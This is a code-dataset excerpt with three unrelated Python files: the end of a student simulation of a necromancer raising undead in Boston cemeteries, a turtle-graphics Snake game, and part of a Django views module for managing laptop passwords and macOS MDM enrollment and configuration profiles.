8 on a 20 sided dice. She raises 12 undead.\n# return 12.\n# Example 2: p_bonus = -4. Necromancer Atwood rolls 8 on a 20 sided dice.\n# 8 - 4 < 5 and she raises 0 undead. return 0.\ndef animate_dead(p_bonus):\n roll = random.randint(1, 20)\n roll_plus_bonus = roll + p_bonus\n if roll_plus_bonus < 5:\n return 0\n else:\n return roll_plus_bonus\n\n\n# Input parameters - none\n# Returns - A list representing the number of controlled and uncontrolled undead\n# # list[0] is controlled list[1] is uncontrolled.\n# Description - Calls animate_dead function for each cemetery Necromancer Atwood visits\n# She will visit central burying ground, granary burying ground, King's chapel burying ground\n# - Each burying ground has different bonuses to raising the dead.\n# Central Burying Ground - keep her winning chance unchanged.\n# Granary Burying Ground - Give her a +2 chance to raise the dead. A bard friend gave her a bonus.\n# King's Chapel Burying Ground - Give her a -2 chance to raise the dead. John Winthrop isn't here for it.\n# - Immediately after calling animate_dead,\n# there is a 25% chance she will lose control of the dead she just raised for that burying ground.\n# - If she raises dead (or raises 0) and keeps control of them, print out\n# \"Necromancer Atwood raised XXX undead in \"\n# - If she raises dead and loses control of them, print out\n# \"Necromancer Atwood raised x undead in but loses control of them\"\n# - update the undead_data list\n# - At the end, Necromancer Atwood can only control 20 undead for long enough to do the dance.\n# At the end, any number of controlled undead become controlled.\n# Calculate if any of the controlled dead become uncontrolled. If so, prints out\n# \"Necromancer Atwood can't control that many undead! x become uncontrolled\" and update list.def raise\n# _army():\n\ndef raise_army():\n undead = animate_dead(0)\n undead_data = [0, 0]\n roll = random.randint(1, 4)\n if roll < 4:\n undead_data[0] += undead\n print(\"Necromancer Atwood raised \" + str(undead) + \" undead in Central Burying Ground\")\n else:\n undead_data[1] += undead\n print(\"Necromancer Atwood raised \" + str(undead) + \" undead in Central Burying Ground, \"\n \"but loses control of them.\")\n\n undead = animate_dead(2)\n roll = random.randint(1, 4)\n if roll < 4:\n undead_data[0] += undead\n print(\"Necromancer Atwood raised \" + str(undead) + \" undead in Granary Burying Ground\")\n else:\n undead_data[1] += undead\n print(\"Necromancer Atwood raised \" + str(undead) + \" undead in Granary Burying Ground, \"\n \"but loses control of them.\")\n\n undead = animate_dead(-2)\n roll = random.randint(1, 4)\n if roll < 4:\n undead_data[0] += undead\n print(\"Necromancer Atwood raised \" + str(undead) + \" undead in King's chapel Burying Ground\")\n else:\n undead_data[1] += undead\n print(\"Necromancer Atwood raised \" + str(undead) + \" undead in King's chapel Burying Ground, \"\n \"but loses control of them.\")\n\n if undead_data[0] > 20:\n undead_data[1] += undead_data[0] - 20\n undead_data[0] = 20\n\n return undead_data\n\n# Input - list of integers that represents each possible outcome.\n# Returns - list of integers that represents each possible outcome.\n# Description - calls raise_army and determines the result\n# sim_data[0] = Atwood gets dance party, but undead take over Boston common.\n# sim_data[1] = Atwood gets dance party, and not enough undead take over Boston common.\n# sim_data[2] = Atwood does not get dance party, but undead take over Boston common.\n# sim_data[3] = Atwood does not get dance party, and not enough undead take over Boston common.\n# Scores are kept similar to College chooser\n# The autograder will look for the following strings:\n# \"Dance party\" for Necromancer Atwood getting dance party (enough controlled undead)\n# \"No dance party\" for Necromancer Atwood not getting dance party (not enough controlled undead)\n# \"Taking over Boston common\" for enough uncontrolled undead to take over Boston common\n# \"Not taking over Boston common\" for not enough uncontrolled undead taking over Boston common\n# capitalization does not matter\n\n\ndef dance(p_sim_data):\n\n undead_data = raise_army()\n controlled = undead_data[0]\n uncontrolled = undead_data[1]\n\n print(undead_data)\n if controlled > 10:\n print(\"Necromancer Atwood raised enough dead for the flash mob. Yay Dance party!\")\n else:\n print(\"Necromancer Atwood did not raise enough dead for the flash mob dance party. No Dance party.\")\n if uncontrolled > 10:\n print(\"The uncontrolled undead are too much. Oh no undead taking over Boston common!\")\n else:\n print(\"The uncontrolled undead are not taking over Boston common.\")\n\n if controlled > 10:\n if uncontrolled > 10:\n p_sim_data[0] += 1\n else:\n p_sim_data[1] += 1\n else:\n if uncontrolled > 10:\n p_sim_data[2] += 1\n else:\n p_sim_data[3] += 1\n return p_sim_data\n\n# Input - list of integers, integers. list represents number of tournament wins. int represents the number of times\n# the simulation ran\n# Output - none\n# Description - prints how many tournaments and Grand Slams Serena won and her win percentage\n\n\ndef data_analysis(p_sim_data, p_num_simulations):\n\n print(\"\\n\\n\\nAn undead army dances Thriller while another overtakes Boston Common \" + str(p_sim_data[0]) +\n \" times out of \" + str(p_num_simulations) + \" simulations. \" +\n str(int(p_sim_data[0]) / int(p_num_simulations) * 100) + \"% of the time\\n\")\n\n print(\"An undead army dances Thriller \" + str(p_sim_data[1]) +\n \" times out of \" + str(p_num_simulations) + \" simulations. Yay! \" +\n str(int(p_sim_data[1]) / int(p_num_simulations) * 100) + \"% of the time\\n\")\n print(\"Necromancer Atwood does not get her dance party, but an uncontrolled undead army takes over Boston Common.\"\n \" Oops. \\nThis event happens \" +\n str(p_sim_data[2]) +\n \" times out of \" + str(p_num_simulations) + \" simulations. \" +\n str(int(p_sim_data[2]) / int(p_num_simulations) * 100) + \"% of the time\\n\")\n\n print(\"No dance party, no undead takeover. It\\'s like nothing happened \" + str(p_sim_data[3]) +\n \" times out of \" + str(p_num_simulations) + \" simulations. \" +\n str(int(p_sim_data[3]) / int(p_num_simulations) * 100) + \"% of the time\\n\")\n\n\n# Input - list of integers, float. list represents number of tournament wins.\n# Output - list of integers that represents the various outcomes for Necromancer Atwood\n# Description - calls dance the number of times the simulation needs to run and then calls data_analysis\ndef run_simulation(p_num_simulations):\n sim_data = [0, 0, 0, 0]\n for index in range(p_num_simulations):\n print(\"Simulation \" + str(index + 1) + \":\")\n sim_data = dance(sim_data)\n # call data_analysis after all the seasons are simulated\n data_analysis(sim_data, p_num_simulations)\n return sim_data\n\n\nnum_simulations = int(input(\"How many times to run simulation? \"))\nsimulation_data = run_simulation(num_simulations)\n\n# This is a fake help from martians\n","repo_name":"Derp7777/CRLS_APCSP_autograder","sub_path":"app/scratch_labs/2019_ewu_4.026.py","file_name":"2019_ewu_4.026.py","file_ext":"py","file_size_in_byte":8143,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"14141668430","text":"from turtle import Screen\nfrom snake import Snake\nfrom food import Food\nfrom scoreboard import Scoreboard\nimport time\nscreen = Screen()\nscreen.setup(1000, 1000)\nscreen.bgcolor(\"black\")\nscreen.title(\"Snake Game\")\nscreen.tracer(0)\n\nsnake = Snake()\nfood = Food()\nscoreboard = Scoreboard(0, 465)\nscreen.listen()\nscreen.onkey(snake.up, \"Up\")\nscreen.onkey(snake.down, \"Down\")\nscreen.onkey(snake.left, \"Left\")\nscreen.onkey(snake.right, \"Right\")\n\ntimes = 0.1\ngame_is_on = True\nwhile game_is_on:\n screen.update()\n time.sleep(times)\n snake.move()\n print(snake.head.xcor())\n num = 0\n for x in snake.segments:\n food.cors_seg_of_snake[num] = (x.xcor(), x.ycor())\n num += 1\n scoreboard.update_score()\n if snake.head.distance(food) < 17:\n snake.eat()\n food.add_seg_of_snake((snake.segments[len(snake.segments)-1].xcor(),\n snake.segments[len(snake.segments)-1].ycor()))\n food.refresh()\n if times > 0.05:\n times -= 0.005\n scoreboard.increase_score()\n if snake.head.xcor() > 490 or snake.head.xcor() < -495 or snake.head.ycor() > 495 or snake.head.ycor() < -490:\n times = 0.1\n snake.reset()\n scoreboard.reset()\n for seg in snake.segments[2:]:\n if snake.head.distance(seg) < 10:\n times = 0.1\n snake.reset()\n scoreboard.reset()\n\nscreen.exitonclick()\n","repo_name":"gajewskikamil/Snake","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1411,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"19119491904","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom hashlib import sha256\nfrom itertools import chain\nimport json, os, datetime, uuid, pytz, plistlib\n\nfrom django.contrib.auth.decorators import login_required, permission_required\nfrom django.core.exceptions import PermissionDenied\nfrom django.core.paginator import Paginator\nfrom django.contrib import messages\nfrom django.conf import settings\nfrom django.db.models import Q\nfrom django.http import JsonResponse, HttpResponse, FileResponse, Http404, HttpResponseRedirect\nfrom django.shortcuts import get_object_or_404, render, reverse\nfrom django.template import loader\nfrom django.utils import timezone\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.views.decorators.http import require_GET, require_POST\nfrom django.views.decorators.cache import never_cache\n\nfrom .models import Laptop, LaptopPasswordRetrieval, LaptopPasswordRotation, ConfigurationProfile, InstallationRecord, \\\n MacOSApp\nfrom .forms import ProfileForm, EnrollmentForm, RemovalForm, ClientForm, AssignmentForm, ProfileRemovalForm, \\\n NewAppForm, UpdateAppForm, UninstallAppForm, AppMergeForm\nfrom emails.generators import GenericEmailGenerator\n\n\n@login_required\n@require_GET\n@permission_required('devices.view_laptop', raise_exception=True)\ndef laptops_list(request):\n \"\"\"View a list of LNL's laptops\"\"\"\n laptops = Laptop.objects.filter(retired=False)\n return render(request, 'laptops/laptops_list.html', {\"laptops\": laptops})\n\n\n@login_required\n@require_GET\n@permission_required('devices.view_laptop_history', raise_exception=True)\ndef laptop_history(request, id):\n \"\"\"\n View a history of password retrievals and rotations for a given laptop\n\n :param id: Primary key of laptop\n \"\"\"\n laptop = get_object_or_404(Laptop, retired=False, pk=id)\n password_retrievals = laptop.password_retrievals.all()\n password_rotations = laptop.password_rotations.all()\n events = sorted(\n chain(\n (('retrieval', r) for r in password_retrievals),\n (('rotation', r) for r in password_rotations)\n ), key=lambda event: event[1].timestamp, reverse=True)\n return render(request, 'laptops/laptop_history.html', {'laptop': laptop, 'events': events})\n\n\n@login_required\n@require_GET\ndef laptop_user_password(request, id):\n \"\"\"\n Retrieve the LNL user password for one of the laptops\n\n :param id: Primary key of laptop\n \"\"\"\n laptop = get_object_or_404(Laptop, retired=False, pk=id)\n if not request.user.has_perm('devices.retrieve_user_password', laptop):\n raise PermissionDenied\n LaptopPasswordRetrieval.objects.create(laptop=laptop, user=request.user, admin=False)\n context = {\n 'title': 'Password for {}'.format(laptop.name),\n 'password': laptop.user_password,\n 'now': timezone.now()\n }\n return render(request, 'laptops/password.html', context)\n\n\n@login_required\n@require_GET\ndef laptop_admin_password(request, id):\n \"\"\"\n Retrieve the admin password for one of the laptops\n\n :param id: Primary key of laptop\n \"\"\"\n laptop = get_object_or_404(Laptop, retired=False, pk=id)\n if not request.user.has_perm('devices.retrieve_admin_password', laptop):\n raise PermissionDenied\n LaptopPasswordRetrieval.objects.create(laptop=laptop, user=request.user, admin=True)\n context = {\n 'title': 'Admin Password for {}'.format(laptop.name),\n 'password': laptop.admin_password,\n 'now': timezone.now()\n }\n return render(request, 'laptops/password.html', context)\n\n\n@require_POST\n@csrf_exempt\ndef rotate_passwords(request):\n \"\"\"\n Endpoint for updating the MacBook passwords once they've been rotated.\n\n :returns: The old passwords so the MacBooks can complete the rotation\n \"\"\"\n data = json.loads(request.body)\n laptop = get_object_or_404(Laptop, retired=False, api_key_hash=sha256(data['apiKey'].encode('utf-8')).hexdigest())\n response_data = {\"oldUserPassword\": laptop.user_password, \"oldAdminPassword\": laptop.admin_password}\n laptop.user_password = data['userPassword']\n laptop.admin_password = data['adminPassword']\n laptop.save()\n LaptopPasswordRotation.objects.create(laptop=laptop)\n return JsonResponse(response_data)\n\n\n@login_required\n@permission_required('devices.manage_mdm', raise_exception=True)\ndef mdm_list(request):\n \"\"\"MDM Console Homepage\"\"\"\n laptops = Laptop.objects.filter(retired=False)\n return render(request, 'mdm/mdm_list.html', {'laptops': laptops})\n\n\n@login_required\n@permission_required('devices.manage_mdm', raise_exception=True)\ndef install_client(request):\n \"\"\"Displays an agreement that the user must agree to before they can download the MDM Client installer\"\"\"\n context = {}\n if request.method == 'POST':\n form = ClientForm(request.POST)\n if form.is_valid():\n installer = os.path.join(settings.MEDIA_ROOT, \"software\", \"mdm\", \"client_installer.dmg\")\n if os.path.exists(installer):\n with open(installer, 'rb') as f:\n response = HttpResponse(f.read(), content_type='application/octet-stream')\n response['Content-Disposition'] = 'attachment; filename=LNL MDM.dmg'\n return response\n messages.add_message(request, messages.WARNING, \"Hmm, we couldn't seem to find the installer. Please try \"\n \"again later.\")\n context['form'] = form\n else:\n context['form'] = form\n else:\n context['form'] = ClientForm()\n context['msg'] = \"New Managed Device\"\n return render(request, 'form_crispy.html', context)\n\n\n@require_POST\n@csrf_exempt\ndef mdm_enroll(request):\n \"\"\"\n Endpoint for starting the enrollment process. Must be contacted directly by the device being enrolled.\n\n :returns: Relative path to the link to complete the enrollment process (if client token is valid)\n \"\"\"\n data = json.loads(request.body)\n if data['token'] == settings.MDM_TOKEN:\n try:\n laptop = Laptop.objects.all().get(api_key_hash=sha256(data['APIKey'].encode('utf-8')).hexdigest())\n except Laptop.DoesNotExist:\n laptop = Laptop.objects.all().create(api_key_hash=sha256(data['APIKey'].encode('utf-8')).hexdigest(),\n name=data['hostname'], user_password=\"None\", admin_password=\"None\")\n laptop.serial = data['serial']\n laptop.last_ip = data['networkIP']\n laptop.save()\n response = {'next': reverse(\"mdm:enroll\", args=[laptop.pk])}\n else:\n response = {'next': reverse(\"mdm:enroll\", args=[0])}\n return JsonResponse(response)\n\n\n@login_required\n@permission_required('devices.manage_mdm', raise_exception=True)\ndef complete_enrollment(request, pk):\n \"\"\"\n Launched once the installation process is completed on a new device. Prompts the user for additional administrative\n details such as the asset tag number to complete the enrollment process.\n\n :param pk: Primary key of device\n \"\"\"\n context = {}\n if str(pk) == '0':\n raise PermissionDenied\n try:\n laptop = Laptop.objects.all().get(pk=pk, serial__isnull=False, mdm_enrolled=False)\n except Laptop.DoesNotExist:\n response = render(request, '404.html', {'status': 'Error',\n 'error_message': 'Unable to enroll device. May already be enrolled.'})\n response.status_code = 404\n return response\n if request.method == 'POST':\n form = EnrollmentForm(request.POST)\n if form.is_valid() and request.POST['asset_tag'] not in [None, '']:\n laptop.name = request.POST['name']\n laptop.asset_tag = request.POST['asset_tag']\n laptop.user_password = request.POST['user_password']\n laptop.admin_password = request.POST['admin_password']\n laptop.mdm_enrolled = True\n laptop.save()\n template = loader.get_template('default.html')\n return HttpResponse(template.render({'title': \"Success!\",\n 'message': \"This device is now enrolled in the LNL MDM.\",\n 'NO_FOOT': True, 'EXIT_BTN': True}, request))\n else:\n context['form'] = EnrollmentForm(request.POST)\n else:\n context['form'] = EnrollmentForm(instance=laptop)\n return render(request, 'form_crispy.html', context)\n\n\n@require_POST\n@csrf_exempt\ndef mdm_checkin(request):\n \"\"\"\n Endpoint for device check-in. Managed devices will check in each time a new user logs onto the device.\n\n :returns: JSON - If resources are pending install, includes the identifiers needed for the client to fetch and \\\n install them. Returns {'status': 200} otherwise.\n \"\"\"\n data = json.loads(request.body)\n laptop = get_object_or_404(Laptop, api_key_hash=sha256(data['APIKey'].encode('utf-8')).hexdigest(),\n mdm_enrolled=True)\n system_profiles = []\n user_profiles = []\n system_profiles_remove = []\n user_profiles_remove = []\n password = None\n\n for record in InstallationRecord.objects.filter(device=laptop, profile__isnull=False, version=\"RM\", active=True):\n profile = record.profile\n if profile.scope == 'System':\n system_profiles_remove.append(profile.pk)\n else:\n user_profiles_remove.append(profile.pk)\n password = settings.MDM_PASS\n\n for profile in laptop.pending.all():\n if profile.pk not in system_profiles_remove and profile.pk not in user_profiles_remove:\n if profile.scope == 'System':\n system_profiles.append(profile.pk)\n else:\n user_profiles.append(profile.pk)\n\n if len(system_profiles) > 0 or len(user_profiles) > 0 or len(system_profiles_remove) > 0 or \\\n len(user_profiles_remove) > 0:\n response_data = {\"status\": 100, \"system_profiles\": system_profiles, \"user_profiles\": user_profiles,\n \"system_profiles_remove\": system_profiles_remove, \"user_profiles_remove\": user_profiles_remove,\n \"removal_password\": password, \"password\": laptop.admin_password}\n else:\n response_data = {\"status\": 200}\n laptop.last_checkin = timezone.now()\n laptop.last_ip = data['networkIP']\n laptop.save()\n return JsonResponse(response_data)\n\n\n@require_POST\n@csrf_exempt\ndef install_confirmation(request):\n \"\"\"\n Endpoint for accepting receipt of install. Managed devices should contact this endpoint anytime new resources are\n installed.\n\n :returns: JSON - {'status': 200}\n \"\"\"\n data = json.loads(request.body)\n device = get_object_or_404(Laptop, api_key_hash=sha256(data['APIKey'].encode('utf-8')).hexdigest(),\n mdm_enrolled=True)\n profiles_installed = data['installed']\n profiles_removed = data['removed']\n apps = data['apps'].split('#')\n for pk in profiles_installed:\n profile = get_object_or_404(ConfigurationProfile, pk=pk)\n timestamp = datetime.datetime.strptime(data['timestamp'], '%Y-%m-%dT%H:%M:%SZ').replace(tzinfo=pytz.UTC)\n metadata = get_profile_metadata(profile, timestamp)\n expiration_date = metadata['expires']\n version = metadata['version']\n device.pending.remove(profile)\n device.installed.add(profile)\n try:\n record = InstallationRecord.objects.get(profile=profile, device=device, active=True)\n record.version = version\n record.expires = expiration_date\n record.installed_on = timezone.now()\n except InstallationRecord.DoesNotExist:\n record = InstallationRecord.objects.create(profile=profile, device=device, version=version,\n expires=expiration_date, active=True)\n record.save()\n for pk in profiles_removed:\n profile = get_object_or_404(ConfigurationProfile, pk=pk)\n device.pending.remove(profile)\n record = InstallationRecord.objects.get(profile=profile, device=device, active=True)\n record.active = False\n record.expires = timezone.now()\n record.save()\n\n installed = []\n for item in apps:\n if item in [None, '']:\n continue\n identifier = item.split('=')[0]\n version = item.split('=')[1]\n app = MacOSApp.objects.filter(name__iexact=identifier).first()\n if app:\n if app.merged_into is not None:\n app = app.merged_into\n if version not in [None, ''] and app.version is None:\n app.version = version\n app.save()\n if app in MacOSApp.objects.filter(pending_install=device):\n app.pending_install.remove(device)\n if app not in MacOSApp.objects.filter(installed=device):\n app.installed.add(device)\n if version is None:\n version = app.version\n InstallationRecord.objects.create(app=app, device=device, version=version)\n elif InstallationRecord.objects.get(app=app, device=device, active=True).version != version:\n record = InstallationRecord.objects.get(app=app, device=device, active=True)\n record.active = False\n record.expires = timezone.now()\n record.save()\n InstallationRecord.objects.create(app=app, device=device, version=version)\n else:\n if version not in [None, '']:\n app = MacOSApp.objects.create(name=identifier, version=version)\n else:\n app = MacOSApp.objects.create(name=identifier)\n app.installed.add(device)\n InstallationRecord.objects.create(app=app, device=device, version=app.version)\n installed.append(app)\n\n for app in MacOSApp.objects.filter(installed=device):\n if app not in installed:\n app.installed.remove(device)\n record = InstallationRecord.objects.get(app=app, device=device, active=True)\n record.active = False\n record.expires = timezone.now()\n record.save()\n return JsonResponse({'status': 200})\n\n\ndef get_profile_metadata(config, timestamp):\n \"\"\"\n Retrieve additional metadata from profile data\n\n :param config: Configuration Profile object\n :param timestamp: Timestamp at time of install\n :returns: Dictionary with profile metadata - {'expires': , 'version': }\n \"\"\"\n with open(config.profile) as profile:\n context = json.load(profile)\n data = {}\n expires_on = None\n expires_after = None\n version = str(context['data']['version'])\n\n if context['data']['removal_date'] is not None:\n expires_on = timezone.make_aware(datetime.datetime.strptime(\n context['data']['removal_date'], '%Y-%m-%dT%H:%M:%SZ')\n ).astimezone(pytz.UTC)\n if context['data']['removal_period'] is not None:\n expires_after = timestamp + timezone.timedelta(seconds=context['data']['removal_period'])\n if expires_on is not None and expires_after is not None:\n if expires_on < expires_after:\n expiration_date = expires_on\n else:\n expiration_date = expires_after\n elif expires_on is not None:\n expiration_date = expires_on\n else:\n expiration_date = expires_after\n\n if context['data']['auto_remove'] == 'default':\n expiration_date = None\n\n data['expires'] = expiration_date\n data['version'] = version\n return data\n\n\ndef dock_app_list(data):\n \"\"\"\n Used in generating macOS configuration profiles. Generates a dictionary with details about applications that should\n be added to the Dock.\n\n :param data: Form data (Dictionary)\n :returns: Dictionary - {'name': , 'path': }\n \"\"\"\n apps = []\n count = data['extra_dock'] + 1\n for i in range(count):\n name = data['app_name_%s' % str(i)]\n path = data['app_path_%s' % str(i)]\n if name not in [None, '']:\n apps.append({'name': name, 'path': path})\n return apps\n\n\ndef fw_app_list(data):\n \"\"\"\n Used in generating macOS configuration profiles. Generates a dictionary used in configuring Firewall settings.\n\n :param data: Form data (Dictionary)\n :returns: Dictionary - {'bundle_id': , 'allowed': }\n \"\"\"\n apps = []\n count = data['extra_firewall']\n for i in range(count):\n bundle = data['id_%s' % str(i + 1)]\n allowed = data['permit_%s' % str(i + 1)]\n if bundle not in [None, '']:\n apps.append({'bundle_id': bundle, 'allowed': allowed})\n return apps\n\n\ndef get_payloads(data):\n \"\"\"\n Generates a dictionary which specifies which payloads are active in a given profile and what their current\n version numbers are.\n\n :param data: Form data (Dictionary)\n :returns: Dictionary of payload versions\n \"\"\"\n types = ['store', 'siri', 'desktop', 'dock', 'energy', 'finder', 'filevault', 'firewall', 'itunes', 'login',\n 'passcode', 'password', 'restrictions', 'safari', 'screensaver', 'setup', 'software', 'diagnostics',\n 'policy', 'preferences', 'time_machine']\n payloads = {}\n for i, payload in enumerate(types):\n if data.get(types[i] + '_version', None) not in [None, '']:\n payloads[payload] = data.get(types[i] + '_version')\n return payloads\n\n\ndef generate_ids():\n \"\"\"\n Generates UUIDs for each of the profile's payloads.\n\n :returns: Dictionary of payload identifiers\n \"\"\"\n payloads = ['info', 'ad_tracking', 'airdrop', 'store', 'siri', 'desktop', 'desktop_services', 'dock', 'energy',\n 'filevault', 'finder', 'firewall', 'itunes', 'login', 'passcode', 'password', 'restrictions', 'safari',\n 'screensaver', 'setup', 'software', 'diagnostics', 'policy', 'policy_2', 'preferences',\n 'preferences_security', 'time_machine']\n ids = {}\n for i, payload in enumerate(payloads):\n identifier = str(uuid.uuid4()).upper()\n ids[payload] = identifier[9:]\n return ids\n\n\ndef load_ids(data):\n \"\"\"\n Reassembles payload identifiers. This is necessary because the MDM does not store the full payload identifiers\n with the profile data.\n\n :param data: Dictionary of payload identifiers\n :returns: Dictionary of payload identifiers\n \"\"\"\n identifiers = {}\n base_id = settings.MDM_UUID\n for payload in data:\n identifiers[payload] = \"%s-%s\" % (base_id, data[payload])\n return identifiers\n\n\n@login_required\n@permission_required('devices.manage_mdm', raise_exception=True)\n@never_cache\ndef list_profiles(request, pk=0):\n \"\"\"\n When given a `pk` value, this view will list all the configuration profiles for a given device. When `pk` is not\n supplied, the view will list all the profiles in the MDM.\n\n :param pk: Primary key of device (Optional)\n \"\"\"\n context = {'items': [], 'resource_type': 'Profile'}\n handle_expired_profiles()\n if pk == 0:\n context['h2'] = \"Configuration Profiles\"\n context['header_1'] = \"Type\"\n context['header_2'] = \"Last Modified\"\n profiles = ConfigurationProfile.objects.all().reverse()\n for profile in profiles:\n assignment_count = profile.pending_install.count()\n install_count = profile.installed.count()\n data = {'filename': str(profile), 'type': \"macOS\", 'meta': profile, 'assignment_count': assignment_count,\n 'install_count': install_count}\n context['items'].append(data)\n else:\n device = get_object_or_404(Laptop, pk=pk)\n context['h2'] = \"Profiles for {}\".format(device.name)\n context['header_1'] = \"Version\"\n context['header_2'] = \"Expires\"\n context['device_view'] = True\n context['device_id'] = pk\n profiles = ConfigurationProfile.objects.filter(pending_install__in=[device])\n profiles |= ConfigurationProfile.objects.filter(installed__in=[device])\n for profile in profiles:\n status = 'Not assigned'\n for entry in profile.installed.all():\n if entry == device:\n status = 'Installed'\n for entry in profile.pending_install.all():\n if entry == device:\n status = 'Assigned'\n record = InstallationRecord.objects.filter(profile=profile, device=device, active=True).first()\n expires_soon = False\n if record is not None and record.expires is not None:\n if timezone.now() < record.expires < timezone.now() + timezone.timedelta(days=30):\n expires_soon = True\n data = {'filename': str(profile), 'downloadable': False, 'install_record': record, 'meta': profile,\n 'status': status, 'expires_soon': expires_soon}\n context['items'].append(data)\n\n return render(request, 'mdm/resource_list.html', context)\n\n\n@login_required\n@permission_required('devices.manage_mdm', raise_exception=True)\ndef link_profiles(request, device=None, profile=None):\n \"\"\"\n Assign configuration profiles to a device. If a primary key value for `device` is supplied, a list of profiles will\n be displayed. The user can then select which profiles to assign to the respective device. The opposite is true\n when a primary key value is supplied for `profile`.\n\n :param device: Primary key of device (Optional)\n :param profile: Primary key of configuration profile (Optional)\n \"\"\"\n context = {}\n if device is not None:\n resource_type = \"profiles\"\n rel = get_object_or_404(Laptop, pk=device)\n options = ConfigurationProfile.objects.exclude(Q(pending_install__in=[rel]) | Q(installed__in=[rel]))\n # The following message will be displayed if there are no options (doesn't render in the form view)\n context['message'] = \"It seems like there are no more profiles that can be assigned to this device.\"\n else:\n resource_type = \"devices\"\n rel = get_object_or_404(ConfigurationProfile, pk=profile)\n options = Laptop.objects.filter(mdm_enrolled=True, retired=False)\\\n .exclude(Q(pending__in=[rel]) | Q(installed__in=[rel]))\n # The following message will be displayed if there are no options (doesn't render in the form view)\n context['message'] = \"It seems like there are no more eligible devices to assign this profile to.\"\n if request.method == 'POST':\n form = AssignmentForm(request.POST, type=resource_type, options=options)\n if form.is_valid():\n selected = form.cleaned_data.get('options')\n context['NO_FOOT'] = True\n if isinstance(rel, Laptop):\n for option in selected:\n config = ConfigurationProfile.objects.get(pk=option)\n rel.pending.add(config)\n if len(selected) == 1:\n context['message'] = \"1 profile was assigned to %s\" % rel.name\n else:\n context['message'] = \"%s profiles were assigned to %s\" % (len(selected), rel.name)\n elif isinstance(rel, ConfigurationProfile):\n for option in selected:\n device = Laptop.objects.get(name=option)\n rel.pending_install.add(device)\n context['message'] = \"This profile has been assigned to %s new device(s)\" % (len(selected))\n context['title'] = \"Success!\"\n context['EXIT_BTN'] = True\n context['EXIT_URL'] = reverse(\"mdm:list\")\n return render(request, 'default.html', context)\n else:\n context['form'] = form\n else:\n if options.count() == 0:\n context['title'] = \"Hmm...\"\n context['NO_FOOT'] = True\n return render(request, 'default.html', context)\n context['form'] = AssignmentForm(type=resource_type, options=options)\n return render(request, 'form_crispy.html', context)\n\n\n@login_required\n@permission_required('devices.manage_mdm', raise_exception=True)\ndef profile_devices(request, pk):\n \"\"\"\n List all devices that are linked to a given profile\n\n :param pk: Primary key of configuration profile\n \"\"\"\n context = {}\n profile = get_object_or_404(ConfigurationProfile, pk=pk)\n to_remove = InstallationRecord.objects.filter(profile=profile, device__pending__in=[profile], active=True,\n version=\"RM\")\n pending = Laptop.objects.filter(pending__in=[profile]).exclude(install_records__in=to_remove)\n installed = InstallationRecord.objects.filter(profile=profile, device__installed__in=[profile], active=True)\\\n .exclude(version=\"RM\")\n pending_removal = []\n for record in to_remove:\n pending_removal.append(record.device)\n context['resource'] = profile\n context['resource_type'] = 'Profile'\n context['pending'] = pending\n context['pending_removal'] = pending_removal\n context['installed'] = installed\n context['today'] = timezone.now()\n context['expiration_warning'] = timezone.now() + timezone.timedelta(days=30)\n return render(request, 'mdm/device_list.html', context)\n\n\n@login_required\n@permission_required('devices.manage_mdm', raise_exception=True)\ndef generate_profile(request, pk=0):\n \"\"\"\n Create or edit a macOS configuration profile\n\n :param pk: Primary key of configuration profile (Optional)\n \"\"\"\n context = {}\n extra_dock = int(request.POST.get('extra_dock', 0))\n extra_firewall = int(request.POST.get('extra_firewall', 0))\n config = ConfigurationProfile.objects.filter(pk=pk).first()\n edit_mode = False\n if config is not None:\n edit_mode = True\n if request.method == 'POST':\n form = ProfileForm(request.POST, extra_dock=extra_dock, extra_firewall=extra_firewall, edit_mode=edit_mode)\n if form.is_valid() and request.POST['save'] != \"+ Add App\" and request.POST['save'] != \"Add App\":\n context['data'] = form.cleaned_data\n context['password'] = 'Nice Try!'\n context['payloads'] = get_payloads(request.POST)\n context['data']['static_apps'] = dock_app_list(context['data'])\n context['data']['firewall_apps'] = fw_app_list(context['data'])\n\n # If removal date, convert to string\n if context['data']['removal_date'] is not None:\n context['data']['removal_date'] = context['data']['removal_date'].strftime(\"%Y-%m-%dT%H:%M:%SZ\")\n\n # Generate UUIDs for the payloads\n if not edit_mode:\n context['identifiers'] = generate_ids()\n else:\n profile_data = open(config.profile)\n data = json.load(profile_data)\n profile_data.close()\n context['identifiers'] = data['identifiers']\n\n # Save to file\n display_name = request.POST.get('display_name')\n filename = request.POST.get('filename')\n path = os.path.join(settings.MEDIA_ROOT, 'profiles', '{}.json'.format(filename))\n with open(path, 'w') as profile:\n profile.write(json.dumps(context))\n\n new_profile, created = ConfigurationProfile.objects.get_or_create(\n name=display_name,\n profile=os.path.join(settings.MEDIA_ROOT, 'profiles', '{}.json'.format(filename))\n )\n new_profile.scope = context['data']['scope']\n new_profile.save()\n\n # If 'Save and Redeploy' selected, configure MDM to update all previously installed copies as well\n if request.POST['save'] == 'Save and Redeploy':\n laptops = Laptop.objects.all().filter(mdm_enrolled=True, retired=False, installed__in=[new_profile])\n for laptop in laptops:\n laptop.installed.remove(new_profile)\n laptop.pending.add(new_profile)\n\n template = loader.get_template('default.html')\n return HttpResponse(template.render({\n 'title': \"Success!\",\n 'message': \"Your new configuration profile has been generated successfully! It is now available for \"\n \"download through the MDM.\",\n 'NO_FOOT': True,\n 'EXIT_BTN': True,\n 'EXIT_URL': reverse(\"mdm:list\")\n }, request))\n else:\n if request.POST['save'] == \"+ Add App\":\n extra_dock += 1\n elif request.POST['save'] == \"Add App\":\n extra_firewall += 1\n context['form'] = ProfileForm(request.POST, extra_dock=extra_dock, extra_firewall=extra_firewall,\n edit_mode=edit_mode)\n else:\n if edit_mode:\n profile_data = open(config.profile)\n file_data = json.load(profile_data)\n if file_data['data']['removal_date'] is not None:\n file_data['data']['removal_date'] = timezone.make_aware(\n datetime.datetime.strptime(file_data['data']['removal_date'], '%Y-%m-%dT%H:%M:%SZ'))\n profile_data.close()\n form = ProfileForm(None, initial=file_data['data'], extra_dock=file_data['data']['extra_dock'],\n extra_firewall=file_data['data']['extra_firewall'], edit_mode=True)\n else:\n identifier = str(uuid.uuid4())\n filename = \"profile-{}\".format(identifier[0:8])\n form = ProfileForm(initial={'filename': filename}, 